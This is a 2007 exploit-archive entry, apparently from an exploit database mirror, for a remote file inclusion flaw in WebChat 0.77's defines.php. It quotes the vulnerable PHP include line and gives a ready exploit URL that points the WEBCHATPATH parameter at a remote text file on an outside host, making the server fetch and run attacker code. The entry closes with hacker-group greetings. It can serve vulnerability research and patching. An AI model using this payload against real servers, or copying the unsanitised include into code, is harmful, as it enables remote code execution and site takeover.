WebChat 0.77 (defines.php WEBCHATPATH) Remote File Include Vuln

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : WebChat 0.77 (defines.php WEBCHATPATH) Remote File Include Vuln
# Published : 2007-01-21
# Author : v1per-haCker
# Previous Title : VisoHotlink 1.01 functions.visohotlink.php Remote File Include Exploit
# Next Title : Mafia Scum Tools 2.0.0 (index.php gen) Remote File Include Exploit

######################################################################### 
# 
#           [ webchat ] 
# 
# Class:     File Include Vulnerability  
# Published  2007/1/21 
# Remote:    Yes  
# Critical   Level : Dangerous 
# Site:      http://www.easy-script.com/compt.php?id=1705  || http://sourceforge.net/projects/webdev-webchat/
# Author:    TheViper-hacker  
# Contact:   theviper-hacker@hotmail.com 
#   
#########################################################################
file ;
frame.php
======================================================
Vuln Code
include ($WEBCHATPATH.'language/english.php');
=======================================================
Exploit :       
Http:// www.Victem.0 / [ webchat-077_path] /defines.php?WEBCHATPATH=http://turnkringonzehoop.be/viper.txt?
 
 ----  Thanx: [MoHaNdKo] [Cold ThreE] [cold zero] [The Wolf KSA]  ]organza[
 ---- GreeTz: All www.4azhar.Com Members Cont : rida-10@msn.com
--------------------------------------||  Viva ISLAM ||-----------------------------------------

# www.Syue.com [2007-01-21]